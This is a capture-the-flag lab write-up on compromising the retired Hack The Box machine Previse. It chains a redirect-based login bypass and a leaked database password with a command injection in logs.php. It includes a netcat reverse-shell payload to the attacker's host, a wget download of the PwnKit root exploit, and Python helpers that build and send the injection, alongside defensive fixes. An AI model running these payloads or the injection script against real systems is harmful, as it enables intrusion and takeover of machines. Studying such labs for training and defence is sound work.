Retired Hack The Box machine: Previse (VIP required)
Previse ~ Hack The Box
We start with a first Nmap scan to find every open TCP port:
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.11.104
Then we run a second, targeted Nmap scan (service and version detection) against the open ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We run the http-enum script against port 80:
# Nmap 7.91 scan initiated Fri Oct 29 10:31:39 2021 as: nmap --script http-enum -p80 -oN WebScan 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.044s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
# Nmap done at Fri Oct 29 10:31:48 2021 -- 1 IP address (1 host up) scanned in 9.17 seconds
We run the Whatweb tool:
http://10.10.11.104:80 [302 Found] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], RedirectLocation[login.php], Script, Title[Previse Home]
We fuzz for PHP files on the web server:
Target: http://10.10.11.104/FUZZ.php
Total requests: 220548
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000187: 200 31 L 60 W 1248 Ch "nav"
000000320: 200 5 L 14 W 217 Ch "footer"
000000004: 302 0 L 0 W 0 Ch "download"
000000002: 302 71 L 164 W 2801 Ch "index"
000000081: 302 112 L 263 W 4914 Ch "files"
000000751: 302 74 L 176 W 2966 Ch "status"
000000040: 200 53 L 138 W 2224 Ch "login"
000001212: 302 0 L 0 W 0 Ch "logout"
000001376: 302 93 L 238 W 3994 Ch "accounts"
000001477: 200 0 L 0 W 0 Ch "config"
000002258: 302 0 L 0 W 0 Ch "logs"
000000178: 200 20 L 64 W 980 Ch "header"
000045227: 403 9 L 28 W 277 Ch "http://10.10.11.104/.php"
Several resources answer with a 302 redirect to login.php, but look at the sizes: index (2801 chars), files (4914), status (2966) and accounts (3994) come back with a full HTML body, while download, logout and logs come back with 0 chars. A redirect that still carries a whole page strongly suggests the PHP script calls header('Location: login.php') without exit(), so the rest of the page is rendered and sent anyway. The browser simply follows the redirect and never shows it. We use Burp Suite to intercept the server response and change the status line so the browser renders the body instead of following the redirect.
We try this on the discovered resource accounts.php.
While intercepting the server response in Burp Suite we change the status line from 302 Found --> 200 OK.
We see that we get into accounts.php, bypassing the login panel.
We proceed to create a user admin:admin:
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
username=admin&password=admin&confirm=admin&submit=
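The Burp trick above does not actually need the status line rewritten to get at the content: the 302 response already contains the full page body, as the wfuzz sizes show. The following Python script is an added example, not part of the original writeup. It triages flattened wfuzz output for 3xx responses that still carry a body (the execution-after-redirect signature) and fetches a URL without following redirects so the body of the 302 can be read directly. The sample wfuzz lines are constructed from the results above; the target URL in the commented call is the one used in this writeup.

```python
"""Execution-after-redirect (EAR) triage: find 302 responses that still carry a page body."""
import http.client
import re
from urllib.parse import urlsplit

# Constructed sample in the flattened wfuzz format shown in this writeup.
WFUZZ_SAMPLE = """\
000000187: 200 31 L 60 W 1248 Ch "nav"
000000004: 302 0 L 0 W 0 Ch "download"
000000002: 302 71 L 164 W 2801 Ch "index"
000000081: 302 112 L 263 W 4914 Ch "files"
000000751: 302 74 L 176 W 2966 Ch "status"
000000040: 200 53 L 138 W 2224 Ch "login"
000001212: 302 0 L 0 W 0 Ch "logout"
000001376: 302 93 L 238 W 3994 Ch "accounts"
000001477: 200 0 L 0 W 0 Ch "config"
000002258: 302 0 L 0 W 0 Ch "logs"
"""

# id: status lines L words W chars Ch "payload"
WFUZZ_LINE = re.compile(r'^\d+:\s+(\d{3})\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"(.*)"$')


def parse_wfuzz(text):
    """Return [(payload, status, chars)] from flattened wfuzz output lines."""
    rows = []
    for line in text.splitlines():
        m = WFUZZ_LINE.match(line.strip())
        if m:
            status, _lines, _words, chars, payload = m.groups()
            rows.append((payload, int(status), int(chars)))
    return rows


def ear_candidates(rows, min_chars=200):
    """A 3xx that still ships hundreds of bytes of HTML is a redirect issued with
    header('Location: ...') but no exit(): the rest of the script kept running."""
    return sorted(p for p, status, chars in rows if 300 <= status < 400 and chars >= min_chars)


def fetch_no_follow(url, timeout=5):
    """GET a URL *without* following redirects; return (status, location, body_bytes).
    The body returned here is exactly what Burp shows after rewriting 302 to 200."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    try:
        conn.request("GET", parts.path or "/")
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    rows = parse_wfuzz(WFUZZ_SAMPLE)
    for name in ear_candidates(rows):
        print(f"[EAR?] {name}.php answers 302 but still sends a body")
    # Live check against the box (needs network; URL from the writeup):
    # status, loc, body = fetch_no_follow("http://10.10.11.104/accounts.php")
    # print(status, loc, len(body))
```

The defensive fix is the mirror image of the check: every header('Location: ...') in the application must be followed by exit() (or the rest of the script wrapped in an else branch), otherwise the authorization check only affects browsers, not anyone reading the raw response.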
We go back to the initial login.php and try to log in as the user we just created.
We log in successfully.
We find the following menu:
HOME ACCOUNTS FILES MANAGEMENT MENU ADMIN
Under FILES we find a file: siteBackup.zip
We download it to our attacking machine and extract it:
# 7z x siteBackup.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 9948 bytes (10 KiB)
Extracting archive: siteBackup.zip
--
Path = siteBackup.zip
Type = zip
Physical Size = 9948
Everything is Ok
Files: 13
Size: 24047
Compressed: 9948
These are the files contained in siteBackup.zip:
# tree
.
├── accounts.php
├── config.php
├── download.php
├── file_logs.php
├── files.php
├── footer.php
├── header.php
├── index.php
├── login.php
├── logout.php
├── logs.php
├── nav.php
├── siteBackup.zip
└── status.php
We find credentials in clear text in config.php (the MySQL root password for the previse database):
# cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
We keep inspecting the web application and its menus. We go to MANAGEMENT MENU, which has two submenus:
Website Status and Log Data.
We intercept a request from the Log Data submenu with Burp Suite:
GET /file_logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.11.104/status.php
Connection: close
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
We see a GET to file_logs.php, but the page also has a button that submits an action with the value comma.
Intercepting that with Burp Suite, we see the button sends a POST to logs.php:
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
delim=comma
Let's inspect the source code of this resource from the backup, since the response suggests some kind of system command is being executed:
# cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>
<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
$filepath = "/var/www/out.log";
$filename = "out.log";
if(file_exists($filepath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
ob_clean(); // Discard data in the output buffer
flush(); // Flush system headers
readfile($filepath);
die();
} else {
http_response_code(404);
die();
}
?>
We note the developer's comment and review the code for a possible command injection. The line $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}") interpolates the delim POST parameter straight into a shell command with no validation or escaping, so whatever we put in delim is executed on the system as www-data. Note also that the method check, if (!$_SERVER['REQUEST_METHOD'] == 'POST'), is broken by operator precedence (the string is negated first and the result compared to 'POST'), so it never redirects; the only effective guard on this endpoint is the session check above it, which we already satisfy.
We send the following POST request, chaining our command with && (URL-encoded as %26%26, since a raw & would start a new form parameter):
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
delim=comma+%26%26+nc+10.10.16.4+443+-e+/bin/bash
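As an added example (not from the original writeup), the script below builds the exact form body of the request above and shows why the & in && has to be percent-encoded in a form body, then adds the server-side check that would have stopped it: a strict allowlist of delimiter tokens. The host, listener address and port are taken from the writeup; the allowlist entries other than comma, and the send helper, are assumptions for illustration.

```python
"""Building, and blocking, the logs.php delim command injection."""
import http.client
import re
from urllib.parse import urlencode

TARGET_HOST = "10.10.11.104"        # from the writeup
LHOST, LPORT = "10.10.16.4", 443    # attacker listener, from the writeup


def reverse_shell_cmd(lhost=LHOST, lport=LPORT):
    """The command appended in the writeup (requires an nc build that supports -e)."""
    return f"nc {lhost} {lport} -e /bin/bash"


def injection_body(delim="comma", cmd=None):
    """Form body for POST /logs.php. The server runs
    `/usr/bin/python /opt/scripts/log_process.py <delim>` through a shell, so
    `<delim> && <cmd>` chains cmd after the script.
    '&' *must* be percent-encoded: a raw '&' in application/x-www-form-urlencoded
    starts a new parameter and the server would only ever see delim=comma."""
    value = delim if cmd is None else f"{delim} && {cmd}"
    # safe="/" keeps /bin/bash readable, matching what Burp produced in the writeup.
    return urlencode({"delim": value}, safe="/")


def content_length(body):
    """Content-Length is the byte length of the encoded body."""
    return len(body.encode())


def send_injection(body, session_cookie, host=TARGET_HOST):
    """POST the body to /logs.php with a logged-in PHPSESSID (network; not run here).
    Returns the HTTP status; the shell arrives at the listener, not in the response."""
    conn = http.client.HTTPConnection(host, 80, timeout=10)
    try:
        conn.request("POST", "/logs.php", body=body, headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": str(content_length(body)),
            "Cookie": f"PHPSESSID={session_cookie}",
        })
        return conn.getresponse().status
    finally:
        conn.close()


# --- defender side ---
# Tokens log_process.py is meant to receive. Only "comma" appears in the writeup;
# "space" and "tab" are assumed names for illustration.
ALLOWED_DELIMS = {"comma", "space", "tab"}
SAFE_TOKEN = re.compile(r"^[a-z]+$")


def validate_delim(value):
    """Reject anything that is not a known token. Pair this with running the script as
    an argv list (subprocess.run([...], shell=False), or escapeshellarg() in PHP) so the
    value can never reach a shell parser even if the allowlist is wrong."""
    if not SAFE_TOKEN.match(value) or value not in ALLOWED_DELIMS:
        raise ValueError(f"invalid delim: {value!r}")
    return value


if __name__ == "__main__":
    body = injection_body("comma", reverse_shell_cmd())
    print(body)
    print("Content-Length:", content_length(body))
    # send_injection(body, "p79kvpmandld75npavcn0cra88")  # needs the box and a valid session
```

On the PHP side the equivalent fix is to validate $_POST['delim'] against the same allowlist and pass it through escapeshellarg() before exec(), or better, drop the shell entirely and have log_process.py map a fixed set of tokens to delimiter characters itself.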
We start an nc listener and receive the reverse shell:
# nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.104] 41780
We then upgrade it to a fully interactive TTY:
www-data@previse:/var/www/html$ script /dev/null -c bash
Script started, file is /dev/null
www-data@previse:/var/www/html$ ^Z
zsh: suspended  nc -vlnp 443
# stty raw -echo; fg
[1]  - continued  nc -vlnp 443
reset xterm
www-data@previse:/var/www/html$ export TERM=xterm
www-data@previse:/var/www/html$ export SHELL=bash
Enumerating the machine and applying an unconventional privilege escalation
www-data@previse:/tmp$ uname -a
Linux previse 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Alternative escalation to root: PwnKit (CVE-2021-4034)
This is not the intended path for the box. It works because pkexec on this retired machine had not been patched when this session was run: the vulnerability was disclosed on 25 January 2022 and the download below is dated 2022-01-30. Before dropping a precompiled exploit on a target it is worth confirming that /usr/bin/pkexec exists and is setuid root, which is the precondition PwnKit relies on.
We clone the following repository on our attacking machine: git clone https://github.com/ly4k/PwnKit.git
We start an HTTP server with python3 on our machine to share the PwnKit binary, and download it on the victim:
www-data@previse:/tmp$ wget http://10.10.16.4/PwnKit
--2022-01-30 13:31:34-- http://10.10.16.4/PwnKit
Connecting to 10.10.16.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14688 (14K) [application/octet-stream]
Saving to: 'PwnKit'
PwnKit 100%[===================>] 14.34K --.-KB/s in 0.1s
2022-01-30 13:31:34 (125 KB/s) - 'PwnKit' saved [14688/14688]
After verifying we have the file, we make it executable:
www-data@previse:/tmp$ ls
PwnKit test
www-data@previse:/tmp$ chmod +x PwnKit
We run the PwnKit exploit and obtain a root shell:
www-data@previse:/tmp$ ./PwnKit
root@previse:/tmp# whoami
root
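The Python preflight below is an added example, not part of this writeup or of the PwnKit repository. It gathers what a practitioner wants to know before running an untrusted binary on a target: whether /usr/bin/pkexec is present and setuid root, what pkexec --version reports, and whether the binary's mtime predates the public disclosure of CVE-2021-4034. The path and the disclosure date are facts; treating the mtime as a hint is a heuristic, since distributions backport fixes without changing the upstream version string, so a vulnerable-looking version alone proves nothing.

```python
"""Pre-flight check before running a PwnKit (CVE-2021-4034) binary on a target."""
import os
import re
import stat
import subprocess

PKEXEC = "/usr/bin/pkexec"
# 2022-01-25 00:00:00 UTC, the day CVE-2021-4034 was disclosed. A pkexec built before
# this date cannot contain the fix; one built after it may or may not (heuristic only).
DISCLOSURE_EPOCH = 1643068800


def is_suid_root(mode, uid):
    """PwnKit needs pkexec to be setuid and owned by root; anything else is a dead end."""
    return bool(mode & stat.S_ISUID) and uid == 0


def parse_pkexec_version(banner):
    """'pkexec version 0.105' -> (0, 105); None if the banner is unexpected."""
    m = re.search(r"pkexec version (\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def preflight(path=PKEXEC):
    """Collect the facts that decide whether running the exploit is worth the noise."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"present": False}
    try:
        banner = subprocess.run([path, "--version"], capture_output=True,
                                text=True, timeout=5).stdout
    except (OSError, subprocess.SubprocessError):
        banner = ""
    return {
        "present": True,
        "suid_root": is_suid_root(st.st_mode, st.st_uid),
        "version": parse_pkexec_version(banner),
        "built_before_disclosure": st.st_mtime < DISCLOSURE_EPOCH,
    }


if __name__ == "__main__":
    info = preflight()
    for key, value in info.items():
        print(f"{key}: {value}")
    if not info.get("present"):
        print("pkexec not installed: PwnKit does not apply here")
    elif not info["suid_root"]:
        print("pkexec is not setuid root: PwnKit will not escalate")
```

Run it from the www-data shell before transferring the exploit; a missing or non-setuid pkexec means the PwnKit route is closed and the intended escalation path for the box should be pursued instead.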
Grabbing the root flag:
root@previse:/tmp# cd /root
root@previse:~# ls
root.txt
root@previse:~# cat root.txt
xxxxxxxxdfadb7ab19dc709216xxxxxxxxx
root@previse:~#
Machine Pwned: Previse (OS command injection + PwnKit)